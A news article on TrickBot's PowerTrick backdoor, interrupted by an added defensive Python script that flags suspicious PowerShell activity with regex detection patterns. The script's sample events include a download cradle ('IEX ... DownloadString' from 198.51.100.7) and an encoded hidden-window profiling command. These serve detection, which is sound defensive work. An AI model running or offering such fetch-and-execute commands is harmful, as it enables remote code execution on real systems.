TrickBot hackers create a new covert backdoor for high-value targets


The infamous TrickBot cyber attack group has developed a new backdoor for targeting high-value victim systems after exploitation.

Dubbed PowerTrick, the post-exploitation tool's ultimate goal is to “bypass restrictions and security controls to adapt to the new era of security controls and exploit the most protected and secure high-quality networks,” SentinelLabs researchers Vitali Kremez, Joshua Platt and Jason Reaves said on Thursday.

TrickBot cyber criminals specialize in the theft of bank details worldwide, often from companies. Trojans associated with the group are constantly evolving, with new modules and tools in development to stay one step ahead of IT teams, exfiltrate data and maintain persistence.


In the second half of last year, researchers warned that in addition to powerful Trojans, backdoors and web injection techniques, the developers had expanded their arsenal with tools designed for SIM swapping attacks. TrickBot malware has also been linked to cryptocurrency theft.

The new tool is most likely launched via Windows PowerShell, the researchers say. A new TrickBot module called “NewBCtest” has been modified to accept execution commands, including the creation of a larger backdoor further down the attack chain.

SentinelLabs says the method used is similar to the open source PowerShell Empire framework, but to remain stealthy, TrickBot has chosen to design PowerTrick so that it is “flexible” and can be expanded “on the spot”.


Scans are performed to profile the infected system, and the collected information is returned along with a unique user ID, which is sent through the backdoor to a command-and-control (C2) server operated by the attackers.

PowerTrick will also use the Metasploit exploitation framework and various PowerShell utilities to move across network drives and systems, deploy additional malware, and perform cleanup and detonation tasks.
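As an added illustration of the defensive side of the behaviour described above (example code written for this page, not code from the article, SentinelLabs or the TrickBot authors): a small Python triage script that scores PowerShell command lines or script-block log entries for traits common to PowerShell-based post-exploitation tooling, such as Base64-encoded commands, download cradles that pipe fetched code into `Invoke-Expression`, hidden windows and host-profiling cmdlets. The sample log lines, the rule set and the indicator weights are constructed for the example and are assumptions; they are not PowerTrick indicators published by anyone.

```python
"""Heuristic triage of PowerShell command lines / script blocks for traits of
PowerShell-based post-exploitation tooling. Added example for this page; not
SentinelLabs' or TrickBot's code. Rules and weights are illustrative assumptions."""
import base64
import re

# (name, regex, weight). Weights are illustrative, not a published scoring scheme.
RULES = [
    ("encoded_command",
     re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"), 3),
    ("download_cradle",
     re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"
                r"|(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b).*\b(?:iex|Invoke-Expression)\b"), 4),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    ("policy_bypass", re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"), 2),
    ("host_profiling",
     re.compile(r"(?i)\b(?:Get-WmiObject|Get-CimInstance|whoami|systeminfo|Get-NetIPConfiguration|Get-NetNeighbor)\b"), 1),
]

# Captures the Base64 payload of -e / -ec / -enc / -EncodedCommand.
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # bad Base64 or not valid UTF-16LE
        return None


def analyze(text):
    """Score one command line / script block against RULES. Indicators found
    inside a decoded -EncodedCommand payload are reported with a 'decoded:' prefix."""
    hits, score = [], 0
    for name, rx, weight in RULES:
        if rx.search(text):
            hits.append(name)
            score += weight
    decoded = decode_encoded_command(text)
    if decoded:
        for name, rx, weight in RULES:
            if name != "encoded_command" and rx.search(decoded):
                hits.append("decoded:" + name)
                score += weight
    return {"score": score, "indicators": hits, "decoded": decoded}


def verdict(score):
    """Map a score to a triage bucket (thresholds are assumptions)."""
    return "high" if score >= 6 else "medium" if score >= 3 else "low"


def _encode(ps):
    """Build a -EncodedCommand payload the way PowerShell expects it (UTF-16LE, Base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (hostname, command text); not real events.
SAMPLE_EVENTS = [
    ("ws01", "Get-ChildItem C:\\Users\\alice\\Documents"),
    ("ws02", "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage')"),
    ("ws03", "powershell -NoP -W Hidden -Enc " + _encode("Get-WmiObject Win32_ComputerSystem; whoami")),
    ("ws04", "whoami /all"),
]


def triage(events):
    """Return (host, verdict, score, indicators) per event, highest score first."""
    rows = []
    for host, text in events:
        r = analyze(text)
        rows.append((host, verdict(r["score"]), r["score"], r["indicators"]))
    rows.sort(key=lambda r: r[2], reverse=True)
    return rows


if __name__ == "__main__":
    for host, level, score, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {level} (score {score}) {', '.join(hits) or '-'}")
```

Run against the constructed events, ws03 ranks highest because the hidden window and encoded command are scored on the raw line and the profiling cmdlet is scored again after the payload is decoded; a single `whoami` on ws04 stays in the low bucket, which is the point of weighting: host profiling alone is common in legitimate administration and only becomes interesting in combination with evasion traits.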


“They remove existing files that have not been executed correctly and move to another destination of their choice or perform lateral movements within the environment to high-quality systems such as financial gateways,” the team says.

It is this lateral movement that should concern businesses. As the recent Travelex incident showed, malware that can spread and encrypt – or steal – data can prove disastrous in a networked environment.

TrickBot has also recently been connected to “Anchor”, a toolset that seems to provide a link between operators and North Korean hacking groups.
